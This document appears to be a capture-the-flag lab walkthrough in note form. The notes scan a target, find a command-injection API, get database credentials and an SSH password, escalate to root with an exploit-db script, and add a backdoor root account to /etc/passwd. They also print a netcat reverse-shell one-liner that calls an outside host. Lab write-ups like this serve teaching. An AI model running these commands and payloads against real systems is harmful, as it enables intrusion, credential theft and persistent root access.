nmap -sV {IP_ADDRESS}
  - 22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  - 3306/tcp open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
  - 9999/tcp open  abyss?

  - we dont have creds for ssh --> only mysql 

nmap -sV {IP_ADDRESS} -p- 
  - 22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  - 3306/tcp  open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
  - 9999/tcp  open  abyss?
  - 15065/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
  - 16109/tcp open  unknown
  - 46969/tcp open  telnet  Linux telnetd
  - -p- (runs more ports)

visit http: http://10.10.21.160:15065/

use...
gobuster dir -u http://{IP_ADDRESS}:15065/ -w /usr/share/wordlists/dirb/big.txt
or
dirbuster 
  -> /monitor (subdomain)

visit http://{IP_ADDRESS}:15065/monitor
  - ping 10.8.0.1
  - POST request to /api/cmd with the body: "ping -c 4 10.8.0.1". That implies that the command is being formed clientside

curl {IP_ADDRESS}:15065/api/cmd -X POST -d "ls -lah"
  - curl is a command-line tool used for making HTTP requests. 
  - -X POST: This specifies that the request method is POST
  - -d "ls -lah": The -d flag is used to send data in a POST request. In this case, you're sending the string "ls -lah"
    - ls: Lists directory contents 
    - -l: Displays detailed (long) listing format (with file permissions, ownership, size, etc.).
    - -a: Includes hidden files (those starting with a dot). 
    - -h: Shows file sizes in a human-readable format (e.g., MB, GB).

curl {IP_ADDRESS}:15065/api/cmd -X POST -d 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.6.110 4242 >/tmp/f'
  - reverse shell 
  - does not work 

mysql -h {IP_ADDRESS} -u root -p
  - password: root10.10
    - show databases;  
    - use users;
    - show tables; 
    - SELECT * FROM User;
+----------+---------------------------------------+
| username | password                              |
+----------+---------------------------------------+
| ramen    | noodlesRTheBest                       |
| flag     | thm{2f30841ff8d9646845295135adda8332} |
+----------+---------------------------------------+

ssh ramen@{IP_ADDRESS}
  - password: noodlesRTheBest
  - find / -uid 0 -perm -4000 -type f 2>/dev/null
    - used to search for files with special permissions on a Linux system

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
https://www.exploit-db.com/exploits/41154

  nano 41154.sh
    - This opens a text editor (nano) to either edit the script 41154.sh
  chmod +x 41154.sh:
    - This makes the script executable by adding the executable permission (+x).
  ./41154.sh
    - You run the script by executing it from the current directory (./).

  whoami 
    - root

----------------------------------------------------------------------------------------
  vim /etc/passwd
    - The /etc/passwd file stores user account information, such as usernames
      - hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
        - Press Esc to enter command mode. Type :wq and press Enter to save the changes and exit Vim.

cat /etc/passwd
su hacker 

